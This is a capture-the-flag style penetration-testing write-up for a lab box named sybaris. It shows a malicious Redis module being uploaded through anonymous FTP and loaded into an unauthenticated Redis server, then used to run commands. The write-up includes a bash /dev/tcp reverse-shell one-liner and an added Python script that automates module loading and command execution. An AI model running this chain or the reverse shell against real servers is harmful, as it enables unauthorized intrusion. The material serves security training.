Malicious Redis Module
The target Redis instance has no authentication configured and runs an outdated release, 5.0.9. That combination leaves it open to several attacks, including loading an attacker-supplied Redis module.
A malicious Redis module (RedisModules-ExecuteCommand) has been compiled and prepared. Loading it gives code execution on the target in the security context of the user running the Redis process.
No Direct Upload
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris/RedisModules-ExecuteCommand]
└─$ redis-cli -h $IP MODULE LOAD ./module.so
(error) ERR Error loading the extension. Please check the server logs.
Attempting to load the module remotely fails: MODULE LOAD takes a path that is resolved on the Redis server's own filesystem, so the .so has to be placed on the target before it can be loaded.
FTP
Earlier I confirmed that the target FTP service allows anonymous access with both read and write permissions, which gives a way to put the module on the target's filesystem.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris/RedisModules-ExecuteCommand]
└─$ ftp ftp@$IP
Connected to 192.168.185.93.
220 (vsFTPd 3.0.2)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd pub
250 Directory successfully changed.
ftp> binary
200 Switching to Binary mode.
ftp> put ./module.so
local: ./module.so remote: ./module.so
229 Entering Extended Passive Mode (|||10091|).
150 Ok to send data.
100% |*******************************************************************************************| 47760 1.85 MiB/s 00:00 ETA
226 Transfer complete.
47760 bytes sent in 00:00 (508.08 KiB/s)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris/RedisModules-ExecuteCommand]
└─$ curl -s -T ./module.so ftp://ftp:ftp@$IP/pub/
Uploading the malicious Redis module to the pub directory via FTP; the curl one-liner is an equivalent non-interactive upload.
FTP Location
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris]
└─$ redis-cli -h $IP MODULE LOAD /srv/ftp/pub/module.so
(error) ERR Error loading the extension. Please check the server logs.
On Debian-based distributions vsftpd serves anonymous FTP from /srv/ftp by default, so that is the first guess.
The load fails, however; the target is CentOS, where the anonymous FTP root is the ftp user's home directory, /var/ftp.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris]
└─$ redis-cli -h $IP MODULE LOAD /var/ftp/pub/module.so
OK
The FTP root is /var/ftp, so the uploaded file is at /var/ftp/pub/module.so.
Successfully loaded the malicious Redis module.
Confirmation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris]
└─$ redis-cli -h $IP MODULE LIST
1) 1) "name"
2) "system"
3) "ver"
4) (integer) 1
MODULE LIST confirms the module is loaded under the name "system".
Exploitation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris]
└─$ redis-cli -h $IP system.exec "id"
"uid=1000(pablo) gid=1000(pablo) groups=1000(pablo)\n"
Code execution confirmed: commands run as pablo, the user the Redis process runs as.
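The same sequence (guess the FTP root, MODULE LOAD, MODULE LIST, system.exec) can be driven without redis-cli by speaking RESP over a raw socket, which is handy from a pivot host where only Python is available. The following is an added example and is not part of the original write-up or of the RedisModules-ExecuteCommand project; the candidate root list, the RedisClient class and the helper names are assumptions for illustration.

```python
"""Minimal RESP client for loading a Redis module and running system.exec.

Added example, not from the write-up. Talks plain RESP over TCP, so it
works wherever Python is available even if redis-cli is not installed.
"""
import socket
from typing import Callable, List, Optional, Tuple


class RedisError(Exception):
    """An error reply ('-ERR ...'); returned, not raised, so callers can
    decide whether a given failure is expected (e.g. a wrong path)."""


class Incomplete(Exception):
    """Raised while parsing when the buffer does not yet hold a whole reply."""


def encode_command(*args: str) -> bytes:
    """Encode a command as a RESP array of bulk strings (what redis-cli sends)."""
    out = b"*%d\r\n" % len(args)
    for a in args:
        b = a.encode()
        out += b"$%d\r\n" % len(b) + b + b"\r\n"
    return out


def parse_reply(buf: bytes) -> Tuple[object, bytes]:
    """Parse one RESP reply; returns (value, remaining_bytes).
    '+' -> str, '-' -> RedisError, ':' -> int, '$' -> bytes/None, '*' -> list/None."""
    if not buf:
        raise Incomplete
    kind, body = buf[:1], buf[1:]
    line, sep, rest = body.partition(b"\r\n")
    if not sep:
        raise Incomplete
    if kind == b"+":
        return line.decode(), rest
    if kind == b"-":
        return RedisError(line.decode()), rest
    if kind == b":":
        return int(line), rest
    if kind == b"$":
        n = int(line)
        if n < 0:
            return None, rest
        if len(rest) < n + 2:
            raise Incomplete
        return rest[:n], rest[n + 2:]
    if kind == b"*":
        n = int(line)
        if n < 0:
            return None, rest
        items = []
        for _ in range(n):
            item, rest = parse_reply(rest)
            items.append(item)
        return items, rest
    raise ValueError("unknown RESP type %r" % kind)


class RedisClient:
    """Socket-backed transport; .call has the same shape as the fake used in tests."""

    def __init__(self, host: str, port: int = 6379, timeout: float = 10.0):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.buf = b""

    def call(self, *args: str):
        self.sock.sendall(encode_command(*args))
        while True:
            try:
                value, self.buf = parse_reply(self.buf)
                return value
            except Incomplete:
                chunk = self.sock.recv(4096)
                if not chunk:
                    raise ConnectionError("server closed the connection")
                self.buf += chunk


Call = Callable[..., object]

# Assumed anonymous-FTP roots, tried in the order a tester would guess them.
CANDIDATE_ROOTS = ["/srv/ftp", "/var/ftp", "/home/ftp"]


def find_module_path(call: Call, module: str = "pub/module.so",
                     roots: List[str] = CANDIDATE_ROOTS) -> Optional[str]:
    """Try MODULE LOAD against each root; return the path that loaded, or None."""
    for root in roots:
        path = root.rstrip("/") + "/" + module
        reply = call("MODULE", "LOAD", path)
        if reply == "OK":
            return path
        if isinstance(reply, RedisError) and "Error loading" in str(reply):
            continue  # file not there (or not loadable) under this root
        raise RuntimeError("unexpected reply to MODULE LOAD %s: %r" % (path, reply))
    return None


def loaded_modules(call: Call) -> List[str]:
    """Names from MODULE LIST, whose reply is an array of [key, value, ...] arrays."""
    names = []
    for entry in call("MODULE", "LIST") or []:
        fields = dict(zip(entry[0::2], entry[1::2]))
        names.append(fields[b"name"].decode())
    return names


def system_exec(call: Call, command: str) -> str:
    """Run a command through the module's system.exec and return its output."""
    reply = call("system.exec", command)
    if isinstance(reply, RedisError):
        raise RuntimeError(str(reply))
    return (reply or b"").decode(errors="replace")


if __name__ == "__main__":
    import sys
    client = RedisClient(sys.argv[1])
    path = find_module_path(client.call)
    print("loaded from:", path, "modules:", loaded_modules(client.call))
    if path:
        print(system_exec(client.call, "id"))
```

The transport is injected as a plain callable so the path-probing and reply-handling logic can be exercised against canned RESP bytes; against a live target, `python3 script.py $IP` performs the same MODULE LOAD / MODULE LIST / system.exec sequence the redis-cli commands above do.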
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris]
└─$ redis-cli -h $IP system.exec 'bash -c "bash -i >& /dev/tcp/192.168.45.218/6379 0>&1"'
Sending a bash reverse shell through system.exec to a listener on port 6379.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/sybaris]
└─$ nnc 6379
listening on [any] 6379 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.185.93] 34238
bash: no job control in this shell
[pablo@sybaris /]$ whoami
whoami
pablo
[pablo@sybaris /]$ hostname
hostname
sybaris
[pablo@sybaris /]$ ifconfig
ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.185.93 netmask 255.255.255.0 broadcast 192.168.185.255
ether 00:50:56:9e:40:39 txqueuelen 1000 (Ethernet)
RX packets 632 bytes 141727 (138.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 153 bytes 11563 (11.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 128 bytes 10368 (10.1 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 128 bytes 10368 (10.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Initial foothold established on the target as the pablo user via RCE from the loaded malicious Redis module.